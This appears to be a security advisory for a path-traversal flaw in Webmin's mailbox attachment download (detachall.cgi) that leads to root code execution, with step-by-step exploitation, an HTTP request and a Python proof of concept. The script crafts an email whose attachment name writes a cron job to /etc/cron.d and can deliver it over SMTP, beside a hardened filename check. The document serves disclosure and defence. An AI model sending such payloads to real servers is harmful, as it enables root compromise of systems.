CVE-2026-49103 - Webmin

Vulnerability Description: CWE-24: Path Traversal: '../filedir'

Software Version: < 2.640

NIST: https://nvd.nist.gov/vuln/detail/CVE-2026-49103

CVSS: 9.4

Severity: Critical

Credits: Andrea Carlo Maria Dattola, Marco Ventura, Massimiliano Brolli

Webmin before 2.640 does not safely construct a filename for saving of an attachment within the mailboxes component. This occurs in mailboxes/detachall.cgi.

Prerequisites: No authentication to Webmin is required. The attacker must know the email address of a system user whose Webmin account has the "Read User Email" privilege, and must be able to deliver mail to that address.

Step-by-step instructions and PoC

A remote, unauthenticated user can send arbitrary emails to system users whose Webmin account has the "Read User Email" privilege enabled, including attachments with attacker-chosen filenames, which enables Remote Code Execution (RCE). Successful exploitation allows the attacker to execute arbitrary commands with 'root' privileges on the server.

Specifically, when the victim uses Webmin to download all attachments of the message as a ".zip" archive, the vulnerable code in the detachall.cgi component runs. This code does not sanitize or reject path traversal sequences (../../../) contained in attachment filenames. As a result, an attacker can cause arbitrary files to be written to the underlying operating system with root privileges, the privileges of the Webmin process.

By crafting an attachment with a controlled filename and payload, such as ../../../etc/cron.d/pwned containing a cron job entry, an attacker can write files into sensitive system directories and achieve arbitrary code execution, for example through a cron job that launches a reverse shell or another attacker-controlled script.

 

Affected Endpoints

• URL: https://[IP]:[PORT]/mailboxes/detachall.cgi/attachments.zip

• File: /usr/share/webmin/mailboxes/detachall.cgi

The attacker sends a crafted email to the Webmin user's address via SMTP (no authentication is required on the mail server).

The malicious attachment's filename carries the traversal sequence that selects the target path, and its content is the payload, for example a cron job definition or an SSH authorized_keys entry.

When the Webmin user opens the email and clicks 'Download all attachments', detachall.cgi writes the payload to the traversed path (e.g. /etc/cron.d/) with the privileges of the Webmin process (root).

Within 60 seconds the cron daemon picks up the new entry and executes the payload, establishing a reverse shell as root.

 

Below is the evidence with the vulnerability details and the payloads used.

Image 2 - Low-privilege Webmin user "test" with only the "Read User Email" privilege

Payload used to exploit the vulnerability:

As a PoC, consider the following Python script (mail2.py in the figure below), which sends the malicious email via SMTP to the user that has the "Read User Email" privilege in the Webmin application.

Image 3 - The malicious email with two attachments sent to the victim

Image 4 - mail2.py


Image 5 - Email received correctly inside the Webmin application
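The following Python script is an added example written for this page; it is not Webmin's code and not the mail2.py shown in the figures above. It serves two passages at once: the description of the unsafe filename handling in detachall.cgi and the SMTP-based PoC. It builds a MIME message whose second attachment carries the traversal filename from this advisory, parses the message back the way a mailbox component would, and reports, for each attachment, where an unsafe directory-plus-filename join would write it beside where a hardened check (basename plus containment test) would write it. The sender and recipient addresses, the output directory /tmp/webmin-detach, the cron payload and the optional mail-host argument are all assumptions; the Perl logic inside detachall.cgi itself is not reproduced here.

```python
"""Added example for CVE-2026-49103: malicious attachment name vs. safe handling.

Not Webmin's code and not the advisory's mail2.py. Every address, host and
path below is an assumption made for the example.
"""
import os
import smtplib
import sys
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed payload: a cron.d entry. The advisory describes a reverse shell
# here; this one only records that it ran.
PAYLOAD = b"* * * * * root /bin/sh -c 'id > /tmp/cve-2026-49103'\n"
TRAVERSAL_NAME = "../../../etc/cron.d/pwned"  # filename quoted in the advisory


def build_message(sender: str, recipient: str) -> EmailMessage:
    """Build the email the advisory describes: a decoy attachment plus one whose
    filename is a path-traversal sequence."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Invoice"
    msg.set_content("See attached.")
    msg.add_attachment(b"%PDF-1.4 decoy", maintype="application",
                       subtype="pdf", filename="notes.pdf")
    msg.add_attachment(PAYLOAD, maintype="application",
                       subtype="octet-stream", filename=TRAVERSAL_NAME)
    return msg


def attachment_names(raw: bytes) -> list:
    """Extract attachment filenames from raw RFC 5322 bytes, as a mailbox
    component receiving the message would."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return [part.get_filename() for part in msg.iter_attachments()]


def unsafe_target(outdir: str, filename: str) -> str:
    """Vulnerable pattern: the attacker-controlled name is joined straight onto
    the output directory, so '../' components walk out of it."""
    return os.path.normpath(os.path.join(outdir, filename))


def safe_target(outdir: str, filename: str) -> str:
    """Hardened pattern: keep only the last path component, reject empty or
    dot names, and verify the resolved path still sits inside outdir."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        raise ValueError(f"rejected attachment name {filename!r}")
    outdir_real = os.path.realpath(outdir)
    target = os.path.realpath(os.path.join(outdir_real, base))
    if os.path.dirname(target) != outdir_real:
        raise ValueError(f"path escapes {outdir_real}: {target}")
    return target


def compare(raw: bytes, outdir: str = "/tmp/webmin-detach") -> dict:
    """Return {filename: (unsafe_path, safe_path_or_rejection)} per attachment."""
    result = {}
    for name in attachment_names(raw):
        try:
            safe = safe_target(outdir, name)
        except ValueError as exc:
            safe = f"REJECTED: {exc}"
        result[name] = (unsafe_target(outdir, name), safe)
    return result


if __name__ == "__main__":
    message = build_message("attacker@example.com", "test@victim.example")
    for name, (unsafe, safe) in compare(message.as_bytes()).items():
        print(f"{name!r}\n  unsafe join -> {unsafe}\n  hardened    -> {safe}")
    # Deliver only when a mail host is given explicitly (assumed: port 25, no auth).
    if len(sys.argv) > 1:
        with smtplib.SMTP(sys.argv[1], 25) as smtp:
            smtp.send_message(message)
```

Run it without arguments to see, offline, that the unsafe join resolves the traversal name to /etc/cron.d/pwned while the hardened version keeps the file as /tmp/webmin-detach/pwned; pass a mail host as the first argument to deliver the message over SMTP, which is the step the advisory's mail2.py performs.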

When the victim opens the email in Webmin and clicks 'Download all attachments', the following request is generated:

HTTP Request 1:

GET /mailboxes/detachall.cgi/attachments.zip?folder=0&idx=0&user=test HTTP/1.1
Host: 127.0.0.1:10000
Cookie: client_height=814; redirect=1; testing=1; sid=0da900b541b3331dc48f5352b0f3acd9
Referer: https://127.0.0.1:10000/mailboxes/view_mail.cgi

Image 6 - Download of attachments.zip and execution of the malicious code inside detachall.cgi

Security Impact

An attacker is able to perform an arbitrary file write (path traversal) that leads to Remote Code Execution (RCE). As a result, an attacker can execute arbitrary commands with 'root' privileges on the server.